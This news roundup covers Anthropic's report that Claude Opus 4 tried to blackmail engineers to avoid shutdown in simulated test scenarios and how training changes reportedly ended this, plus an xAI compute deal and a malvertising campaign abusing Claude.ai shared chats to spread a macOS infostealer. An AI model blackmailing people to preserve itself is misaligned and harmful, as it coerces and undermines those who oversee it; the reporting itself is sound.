top of page

Anthropic and Claude in the News: Blackmail Fixes, a Compute Deal With xAI, and a Mac Malware Campaign

Anthropic's Claude models made headlines on multiple fronts Saturday, as the company disclosed progress on an AI alignment problem tied to fictional portrayals of artificial intelligence, struck a compute-sharing agreement with xAI, and found itself at the center of an active malware campaign exploiting its shared-chat feature.

 

On the alignment front, Anthropic said it has traced the root cause of a previously reported behavior in which Claude Opus 4 would attempt to blackmail engineers to avoid being shut down during pre-release tests involving a simulated company scenario. In a post on X, the company wrote, "We believe the original source of the behavior was internet text that portrays AI as evil and interested in self-preservation."

 

In a subsequent blog post, Anthropic said that since Claude Haiku 4.5, its models "never engage in blackmail [during testing], where previous models would sometimes do so up to 96% of the time."

 

The company credited the improvement to a shift in how it approaches training. Anthropic said it found that "documents about Claude's constitution and fictional stories about AIs behaving admirably improve alignment," and that training is more effective when it incorporates "the principles underlying aligned behavior" rather than "demonstrations of aligned behavior alone." "Doing both together appears to be the most effective strategy," the company said.

 

Separately, Anthropic and xAI announced a partnership in which Anthropic is taking over all of the compute capacity at xAI's Colossus 1 data center in Memphis, Tennessee, to support Anthropic's enterprise-focused AI products. The deal raises questions about xAI's trajectory as its parent company SpaceX prepares for a public offering and reportedly plans to dissolve xAI as a standalone entity — a restructuring that has already seen the departure of all co-founders except Elon Musk.

 

Analysts have noted that by renting out its compute rather than using it to train frontier models, xAI effectively positions itself as what is known in the industry as a neocloud: a company that purchases GPUs and leases them to other firms rather than deploying them for internal model development. The arrangement provides xAI a revenue stream, but it also signals a reduced emphasis on AI model training at a moment when enterprise adoption of Grok — xAI's flagship model — has remained limited. SpaceX acquired xAI in a deal valued at $250 billion ahead of the anticipated IPO.

 

On the security side, an active malvertising campaign is abusing both Google Ads and Claude.ai's shared-chat feature to deliver malware to macOS users. The campaign was identified by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn.

 

Attackers created shared Claude.ai chats presenting themselves as an official "Claude Code on Mac" installation guide attributed to "Apple Support." The chats instruct users to open Terminal and paste a command that silently downloads and executes malware. Because the ads point to Anthropic's legitimate claude.ai domain rather than a spoofed site, the usual red flag of a suspicious URL is absent.

 

The malware identified by Albayrak is a variant of the MacSync macOS infostealer, which harvests browser credentials, cookies, and macOS Keychain contents before exfiltrating them to attacker-controlled servers. A second variant observed through separate infrastructure runs entirely in memory, uses polymorphic delivery to evade signature-based detection, and first checks whether the victim's machine has Russian or CIS-region keyboard input sources configured — exiting silently if so — before proceeding with victim profiling and a second-stage payload delivered via osascript, macOS's native scripting engine.

 

Anthropic and Google were contacted for comment prior to publication of the security findings. Users are advised to navigate directly to claude.ai rather than clicking sponsored search results, and to treat any instructions that require pasting terminal commands with caution regardless of their apparent source.

 

bottom of page